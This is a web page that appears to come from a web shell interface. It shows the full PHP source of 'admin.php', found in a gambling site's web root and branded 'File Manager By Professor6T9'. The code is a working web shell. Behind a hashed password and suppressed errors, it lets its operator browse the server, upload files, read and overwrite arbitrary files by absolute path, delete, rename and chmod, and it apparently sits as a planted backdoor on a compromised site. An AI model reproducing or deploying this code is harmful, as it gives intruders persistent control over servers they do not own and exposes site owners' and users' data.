D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
vblioqus
/
luckylandslots.pro
/
Filename :
admin.php
back
Copy
<?php error_reporting(0); session_start(); // --- Logout Handling --- if (isset($_GET['logout'])) { $_SESSION = []; session_destroy(); header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?')); exit; } // --- Login Handling --- $p = "89029e2d3f77b399fbbad3776f225b1f"; // md5(md5(md5('password'))) if (isset($_POST['password']) && md5(md5(md5($_POST['password']))) === $p) { $_SESSION['logged_in'] = 1; header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?')); exit; } // --- Gatekeeper: If not logged in, show login form and exit --- // [MODIFIED] 使用了第一个脚本中的 Tailwind CSS 登录页面 if (empty($_SESSION['logged_in'])) { echo '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Login</title><script src="https://cdn.tailwindcss.com"></script></head><body class="bg-gray-100 flex items-center justify-center h-screen"><div class="bg-white p-8 rounded-lg shadow-md w-full max-w-sm"><h1 class="text-2xl font-bold mb-6 text-center">Login</h1><form method="post" class="space-y-4"><input type="password" name="password" placeholder="Password" class="w-full p-2 border rounded" autofocus required><button class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Login</button></form></div></body></html>'; exit; } // --- 以下是第二个脚本原有的全部功能代码,未做任何改变 --- // --- ROBUST PATH HANDLING (FINAL FIX) --- $home = $_SERVER['HOME'] ?? '/'; $path = getcwd(); // Default to current directory if (isset($_GET['path'])) { $temp_path = $_GET['path']; // Normalize path and prevent directory traversal $temp_path = str_replace('\\', '/', $temp_path); $parts = explode('/', $temp_path); $safe_parts = []; foreach ($parts as $part) { if ($part === '.' || $part === '') continue; if ($part === '..') { if (!empty($safe_parts)) { array_pop($safe_parts); } } else { $safe_parts[] = $part; } } // Determine if it's an absolute path $is_absolute = (strpos($_GET['path'], '/') === 0 || preg_match('/^[a-zA-Z]:\\\\/', $_GET['path'])); $prefix = $is_absolute ? '/' : ''; $temp_path = $prefix . implode('/', $safe_parts); if (is_dir($temp_path) && is_readable($temp_path)) { $path = $temp_path; } } $path = rtrim(str_replace('\\', '/', $path), '/'); if (empty($path)) $path = '/'; $uploadSuccess = false; $uploadMessage = ''; $currentYear = date("Y"); function h($str) { return htmlspecialchars($str, ENT_QUOTES); } function delete_dir($dirPath) { if (!is_dir($dirPath)) return; if (substr($dirPath, -1) != '/') $dirPath .= '/'; $files = glob($dirPath . '*', GLOB_MARK); foreach ($files as $file) { if (is_dir($file)) delete_dir($file); else unlink($file); } @rmdir($dirPath); } // Handle POST Actions if ($_SERVER['REQUEST_METHOD'] === 'POST') { $action = $_POST['action'] ?? ''; if (isset($_FILES['upload'])) { $total_files = count($_FILES['upload']['name']); $uploaded_count = 0; for ($i = 0; $i < $total_files; $i++) { if ($_FILES['upload']['error'][$i] == UPLOAD_ERR_OK) { $dest = $path . '/' . basename($_FILES['upload']['name'][$i]); if (move_uploaded_file($_FILES['upload']['tmp_name'][$i], $dest)) { $uploaded_count++; } } } if ($uploaded_count > 0) { $uploadSuccess = true; $uploadMessage = "✅ {$uploaded_count} file(s) uploaded successfully!"; } } elseif ($action === 'batch_delete' && !empty($_POST['selected_items'])) { foreach ($_POST['selected_items'] as $item) { $target = $path . '/' . basename($item); if (file_exists($target)) { if (is_dir($target)) delete_dir($target); else unlink($target); } } } elseif ($action === 'chmod' && isset($_POST['file'], $_POST['perms'])) { chmod($path . '/' . basename($_POST['file']), intval($_POST['perms'], 8)); } elseif ($action === 'save_edit' && isset($_POST['file_path'], $_POST['content'])) { file_put_contents($_POST['file_path'], $_POST['content']); header("Location: ?path=" . urlencode(dirname($_POST['file_path']))); exit; } elseif ($action === 'rename' && isset($_POST['old_name'], $_POST['new_name'])) { rename($path . '/' . basename($_POST['old_name']), $path . '/' . basename($_POST['new_name'])); } if ($action !== 'save_edit') { header("Location: ?path=" . urlencode($path)); exit; } } // Handle GET Actions if (isset($_GET['action'])) { $action = $_GET['action']; if ($action === 'get_content' && isset($_GET['file'])) { $file_path = $_GET['file']; if (is_file($file_path) && is_readable($file_path)) { echo h(file_get_contents($file_path)); } else { echo "Error: Cannot read file."; } exit; } if ($action === 'delete' && isset($_GET['item'])) { $target = $path . '/' . basename($_GET['item']); if (file_exists($target)) { if (is_dir($target)) delete_dir($target); else unlink($target); } header("Location: ?path=" . urlencode($path)); exit; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>📁</title> <style> body { background: #111; color: #eee; font-family: monospace; padding: 20px; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 15px; background: #1c1c1c; } th, td { padding: 8px; border: 1px solid #333; text-align: left; word-break: break-all; } th { background: #2a2a2a; } input, button, textarea { background: #222; color: #eee; border: 1px solid #444; padding: 5px; border-radius: 4px; font-family: monospace; } button { background: #6cf; color: #000; font-weight: bold; cursor: pointer; } button.danger { background: #f66; color: #fff; } .breadcrumb a { color: #ccc; margin-right: 5px; } .breadcrumb span { color: #888; margin: 0 4px; } .card { background: #1c1c1c; padding: 15px; border-radius: 8px; box-shadow: 0 0 10px #000; margin-top: 20px; } footer { text-align: center; margin-top: 40px; color: #666; font-size: 0.9em; } .modal { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: rgba(0,0,0,0.7); } .modal-content { background-color: #1c1c1c; margin: 5% auto; padding: 20px; border: 1px solid #444; width: 80%; max-width: 800px; border-radius: 8px; display: flex; flex-direction: column; height: 80vh; } .modal-header { padding-bottom: 10px; border-bottom: 1px solid #333; } .modal-body { flex-grow: 1; margin: 10px 0; display: flex; flex-direction: column; } .modal-body textarea { width: 100%; flex-grow: 1; resize: none; } .modal-footer { padding-top: 10px; border-top: 1px solid #333; text-align: right; } .close { color: #aaa; float: right; font-size: 28px; font-weight: bold; } .close:hover, .close:focus { color: #fff; text-decoration: none; cursor: pointer; } </style> <?php if ($uploadSuccess): ?> <script>alert("<?= $uploadMessage ?>");</script> <?php endif; ?> </head> <body> <div style="display: flex; justify-content: space-between; align-items: center;"> <h2>📁 File Manager By Professor6T9</h2> <a href="?logout=1" style="color: #f66; font-size: 0.9em;">Logout</a> </div> <form method="get"> <label>📂 Change Directory:</label> <input type="text" name="path" value="<?= h($path) ?>" style="width:60%;"> <button type="submit">Go</button> </form> <div class="breadcrumb"> <?php $crumbs = explode('/', trim($path, '/')); $accum = ''; echo '<a href="?path=/">/</a>'; if ($path !== '/') { foreach ($crumbs as $crumb) { if (empty($crumb)) continue; $accum .= '/' . $crumb; echo '<span>/</span><a href="?path=' . urlencode($accum) . '">' . h($crumb) . '</a>'; } } echo '<span>/</span><a href="?path=' . urlencode($home) . '">[ HOME ]</a>'; ?> </div> <?php $parent_path = dirname($path); if ($parent_path !== $path): ?> <p><a href="?path=<?= urlencode($parent_path) ?>">⬅️ [ PARENT DIR ]</a></p> <?php endif; ?> <div class="card"> <form method="post" enctype="multipart/form-data"> <input type="file" name="upload[]" required multiple> <button type="submit">📤 Upload</button> </form> </div> <form method="post" id="file-list-form"> <input type="hidden" name="action" value="batch_delete"> <div class="card"> <div style="margin-bottom: 10px;"> <button type="submit" class="danger" onclick="return confirm('Are you sure you want to delete all selected items?');">🗑️ Delete Selected</button> </div> <table> <thead> <tr> <th><input type="checkbox" id="select-all-checkbox"></th> <th>Name</th><th>Size (kB)</th><th>Modified</th><th>Perms</th><th>Actions</th> </tr> </thead> <tbody> <?php $items = @scandir($path); if ($items === false) { echo '<tr><td colspan="6" style="color: #f66;">Error: Cannot read directory. Check permissions.</td></tr>'; } else { $dirs = $files = []; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; if (@is_dir($path . '/' . $item)) $dirs[] = $item; else $files[] = $item; } $all = array_merge($dirs, $files); foreach ($all as $item) { $full = ($path === '/' ? '' : $path) . '/' . $item; $isDir = is_dir($full); $perm = substr(sprintf('%o', @fileperms($full)), -4); $mtime = @filemtime($full); $size = $isDir ? '-' : round(@filesize($full) / 1024, 2); $date = $mtime ? date("Y-m-d H:i:s", $mtime) : '-'; echo '<tr>'; echo '<td><input type="checkbox" class="item-checkbox" name="selected_items[]" value="' . h($item) . '"></td>'; echo '<td>'; echo $isDir ? '<a href="?path=' . urlencode($full) . '">📁 ' . h($item) . '</a>' : '📄 ' . h($item); echo '</td>'; echo "<td>$size</td><td>$date</td>"; echo '<td> <input type="text" id="perms-input-' . h($item) . '" value="' . $perm . '" size="4" style="text-align:center;"> <button type="button" onclick="setChmod(\'' . h($item) . '\')">Set</button> </td>'; echo '<td>'; echo '<a href="javascript:void(0)" onclick="openRenameModal(\'' . h($item) . '\')">✏️ Rename</a> | '; echo '<a href="?action=delete&path=' . urlencode($path) . '&item=' . urlencode($item) . '" onclick="return confirm(\'Delete this item?\')">🗑️</a>'; if (!$isDir) { echo ' | <a href="javascript:void(0)" onclick="openEditModal(\'' . h($full) . '\')">📝 Edit</a>'; echo ' | <a href="' . h($item) . '" download>⬇️ Download</a>'; } echo '</td></tr>'; } } ?> </tbody> </table> </div> </form> <footer>© <?= $currentYear ?> | File Manager by <a href="http://t.me/Professor6T9" target="_blank">@Professor6T9</a></footer> <!-- Hidden form for chmod to avoid nesting --> <form method="POST" id="chmod-form" style="display:none;"> <input type="hidden" name="action" value="chmod"> <input type="hidden" id="chmod_file_hidden" name="file"> <input type="hidden" id="chmod_perms_hidden" name="perms"> </form> <!-- Modals --> <div id="editModal" class="modal"> <div class="modal-content"> <div class="modal-header"> <span class="close" onclick="closeModal('editModal')">×</span> <h3>Edit File</h3> </div> <form method="POST" class="modal-body"> <input type="hidden" name="action" value="save_edit"> <input type="hidden" id="edit_file_path" name="file_path"> <textarea id="edit_content" name="content"></textarea> <div class="modal-footer"> <button type="submit">💾 Save</button> </div> </form> </div> </div> <div id="renameModal" class="modal"> <div class="modal-content" style="height: auto;"> <div class="modal-header"><span class="close" onclick="closeModal('renameModal')">×</span><h3>Rename Item</h3></div> <form method="POST" class="modal-body"> <input type="hidden" name="action" value="rename"> <input type="hidden" id="rename_old_name" name="old_name"> <label>New Name:</label> <input type="text" id="rename_new_name" name="new_name" style="width: 100%;"> <div class="modal-footer"><button type="submit">✏️ Rename</button></div> </form> </div> </div> <script> function closeModal(id) { document.getElementById(id).style.display = 'none'; } function openEditModal(filePath) { const modal = document.getElementById('editModal'); const contentArea = document.getElementById('edit_content'); document.getElementById('edit_file_path').value = filePath; contentArea.value = 'Loading content...'; modal.style.display = 'block'; fetch(`?action=get_content&file=${encodeURIComponent(filePath)}`) .then(response => response.text()) .then(data => { contentArea.value = data; }) .catch(error => { contentArea.value = 'Error loading file content: ' + error; }); } function openRenameModal(oldName) { document.getElementById('rename_old_name').value = oldName; document.getElementById('rename_new_name').value = oldName; document.getElementById('renameModal').style.display = 'block'; document.getElementById('rename_new_name').focus(); } function setChmod(fileName) { const permsValue = document.getElementById('perms-input-' + fileName).value; document.getElementById('chmod_file_hidden').value = fileName; document.getElementById('chmod_perms_hidden').value = permsValue; document.getElementById('chmod-form').submit(); } document.addEventListener('DOMContentLoaded', function() { const selectAllCheckbox = document.getElementById('select-all-checkbox'); if (selectAllCheckbox) { selectAllCheckbox.addEventListener('change', function() { const itemCheckboxes = document.querySelectorAll('.item-checkbox'); itemCheckboxes.forEach(checkbox => { checkbox.checked = this.checked; }); }); } window.onclick = function(event) { if (event.target.classList.contains('modal')) { event.target.style.display = "none"; } } }); </script> </body> </html>